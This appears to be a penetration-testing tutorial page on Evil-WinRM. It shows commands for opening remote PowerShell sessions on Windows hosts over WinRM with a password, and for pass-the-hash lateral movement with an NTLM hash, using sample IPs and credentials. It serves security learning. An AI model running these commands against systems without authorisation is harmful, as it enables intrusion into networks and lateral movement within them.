Skip to main content

Evil-WinRM

This section will cover using Evil-WinRM.

Table of Contents
  • Overview
  • Using Evil-WinRM
    • Pass-the-Hash

Overview

Evil-WinRM can be used to abuse the WinRM protocol to get a remote shell session using the IP address of the target and user credentials.

To install it, we can use the command apt install evil-winrm on Kali Linux.

Windows Remote Management (WinRM) is Microsoft's implementation of the network protocol Web Services Management Protocol (WS-Management). It is based on XML web services using Simple Object Access Protocol (SOAP) used for remote management of Windows systems.

For security reasons, WinRM must be activated and configured manually in Windows 10. Therefore, it depends heavily on the environment security in a domain or network where WinRM is used.

WinRM uses TCP ports 5985 (HTTP) and 5986 (HTTPS) by default.

Using Evil-WinRM

To use Evil-WinRM, we can use the following.

evil-winrm -i <Target IP> -u <Username> -p <Password>

Command breakdown:

  • -i <Target IP> - Specify the target IP address.
  • -u <Username> - Specify the username to use for authentication.
  • -p <Password> - Specify the password to use for authentication.

An example will be:

evil-winrm -i 10.42.0.222 -u myuser -p Supers3cret

Command breakdown:

  • -i 10.42.0.222 - Specify the target IP address.
  • -u myuser - Specify the username to use for authentication.
  • -p Supers3cret - Specify the password to use for authentication.

If the login is successful, a terminal session will be initialised using the PowerShell Remoting Protocol (MS-PSRP).

Pass-the-Hash

If we are unable to crack a hash, we can consider using an attack method called Pass-the-Hash (PtH). A PtH attacks takes advantage of the NTLM authentication protocol to authenticate a user using a password hash.

This method can be used to move laterally after an initial compromise in a network.

Instead of using username:clear-text password for the login, we can use username:password hash to authenticate.

We can use Evil-WinRM to perform this using the following command. Note that we will need to use <username>@<domain> to authenticate using domain accounts.

evil-winrm -i <Target IP> -u <username> -H <password hash>

Command breakdown:

  • -i <Target IP> - Specify the target IP address.
  • -u <username> - Specify the account username to login as. Optionally, use <username>@<domain> to login to a domain account.
  • -H <password hash> - Specify the password hash.

An example will be:

evil-winrm 10.42.20.3 -u administrator -H BCD82943C6AC81E7DFFBD85D253961FA

Or if attempting to login to a domain account:

evil-winrm 10.42.20.3 -u administrator@acorp.lan -H BCD82943C6AC81E7DFFBD85D253961FA